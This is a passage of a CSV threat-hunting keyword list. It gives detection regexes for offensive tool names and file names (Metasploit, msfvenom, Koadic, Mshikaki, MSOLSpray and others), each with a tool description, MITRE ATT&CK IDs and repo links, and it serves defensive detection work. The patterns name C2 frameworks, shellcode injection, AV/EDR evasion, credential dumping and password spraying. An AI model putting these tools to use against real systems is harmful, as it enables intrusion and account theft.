- T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfconsole.*",".{0,1000}msfconsole\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfconsole_spec*",".{0,1000}msfconsole_spec.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfcrawler.*",".{0,1000}msfcrawler\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfd.rb*",".{0,1000}msfd\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb --component*",".{0,1000}msfdb\s\-\-component.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb --use-defaults*",".{0,1000}msfdb\s\-\-use\-defaults.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfdb_helpers*",".{0,1000}msfdb_helpers.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfencode*",".{0,1000}msfencode.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfJavaToolkit*",".{0,1000}msfJavaToolkit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-json-rpc.*",".{0,1000}msf\-json\-rpc\..{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msf-json-rpc.ru*",".{0,1000}msf\-json\-rpc\.ru.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msflag.ps1*",".{0,1000}msflag\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MsfModule*",".{0,1000}MsfModule.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msfmodule.py*",".{0,1000}msfmodule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MsfModuleAsFunction*",".{0,1000}MsfModuleAsFunction.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 
- T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*msfpattern.*",".{0,1000}msfpattern\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfpayload*",".{0,1000}msfpayload.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfpc.sh*",".{0,1000}msfpc\.sh.{0,1000}","offensive_tool_keyword","msfpc","A quick way to generate various basic Meterpreter payloads via msfvenom (part of the Metasploit framework)","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","0","N/A","N/A","10","1176","267","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" "*msfrelay.py*",".{0,1000}msfrelay\.py.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-revhttps*",".{0,1000}msf\-revhttps.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*MSFRottenPotato*",".{0,1000}MSFRottenPotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*MSFRottenPotato.*",".{0,1000}MSFRottenPotato\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msf-sgn.raw*",".{0,1000}msf\-sgn\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*msfstaged.exe *",".{0,1000}msfstaged\.exe\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*msfupdate_spec.*",".{0,1000}msfupdate_spec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfvemonpayload*",".{0,1000}msfvemonpayload.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*msfvenom *",".{0,1000}msfvenom\s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*msfvenom -*",".{0,1000}msfvenom\s\-.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*--msfvenom *",".{0,1000}\-\-msfvenom\s.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*msfvenom -p windows/x64/exec*",".{0,1000}msfvenom\s\-p\swindows\/x64\/exec.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Mshikaki.exe*",".{0,1000}Mshikaki\.exe.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*Mshikaki-main*",".{0,1000}Mshikaki\-main.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","131","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z" "*mshta/shellcode_inject*",".{0,1000}mshta\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*MSHTAStager*",".{0,1000}MSHTAStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*msi-search-main.zip*",".{0,1000}msi\-search\-main\.zip.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*msLDAPDump.py*",".{0,1000}msLDAPDump\.py.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*MSOfficeManipulator.cs*",".{0,1000}MSOfficeManipulator\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*msol_dump*",".{0,1000}msol_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - 
T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*msol_dump.ps1*",".{0,1000}msol_dump\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*MSOLSpray *",".{0,1000}MSOLSpray\s.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","0","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray.git*",".{0,1000}MSOLSpray\.git.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray.ps1*",".{0,1000}MSOLSpray\.ps1.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*MSOLSpray-master*",".{0,1000}MSOLSpray\-master.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts 
